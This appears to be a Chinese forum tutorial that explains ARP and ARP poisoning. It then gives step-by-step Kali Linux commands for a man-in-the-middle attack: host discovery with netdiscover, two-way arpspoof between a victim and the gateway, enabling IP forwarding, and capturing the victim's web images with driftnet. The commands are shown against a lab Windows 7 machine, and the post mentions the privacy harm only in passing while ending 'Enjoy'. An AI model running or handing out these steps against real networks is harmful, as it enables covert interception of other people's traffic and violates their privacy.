什么是ARP协议?

(地址解析协议):地址解析协议是一种通信协议,用于查询与给定互联网层地址(通常是IPv4地址)相关联的链路层地址(如MAC地址)。这种映射是Internet协议簇中的一个关键功能。
ARP中毒。

什么是ARP中毒?

地址解析协议中毒(ARP中毒)是一种攻击形式,攻击者通过使用伪造的ARP请求和应答数据包更改目标计算机的ARP缓存,从而更改媒体访问控制(MAC)地址并攻击以太网LAN。

Driftnet

Driftnet工具:Driftnet监视网络流量,抓取网络流量中的JPEG和GIF图像。这侵犯了人们的隐私,无论何时何地我们都不能这么做。除此之外,它还可以从网络中提取MPEG音频数据。
ARP中毒和在Kali Linux中使用Driftnet工具。
打开kali linux终端


扫描以查找网络(LAN)中的所有计算机。
输入命令:
netdiscover -r(ip范围)

结果:


192.168.243.1是网络IP。

192.168.243.2:默认网关。

192.168.243.254:广播IP。

仅剩下IP 192.168.243.129。
ping一下看看能不能通
收到响应之后,可以操作一下了
现在我们有了目标计算机的IP地址(192.168.243.129)。

现在我们可以执行ARP中毒。
命令:

arpspoof -i eth0 -t 192.168.243.129 192.168.243.2


这将禁用目标计算机中的Internet。


现在是端口转发的时候了,这样就不会有拒绝服务的情况。
命令:

检查端口转发是否启用。

cat /proc/sys/net/ipv4/ip_forward

如果结果为0则表示其关闭。

启用命令:

echo 1 > /proc/sys/net/ipv4/ip_forward

然后在目标计算机中进行ARP欺骗。

输入命令:

arpspoof -i eth0 -t 192.168.243.2 192.168.243.129


由于在目标计算机中启用了ARP欺骗。现在就是Driftnet大展身手的时候了。

driftnet -i eth0


您将得到一个名为driftnet的空白框。

这样 你就成功了,可以获得目标计算机的图片。
在这里,我在Win7操作系统中搜索Pokemon图片。


攻击者将在他的Kali Linux机器屏幕上的driftnet终端中获得所有的图片。


这就是Arp中毒和Driftnet工具的工作原理。
注意Driftnet工具可用作中间人(MITM)攻击,但仅适用于端口80。

更多精彩等着你的到来!
Enjoy…. ☺☺☺☺☺☺☺☺

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖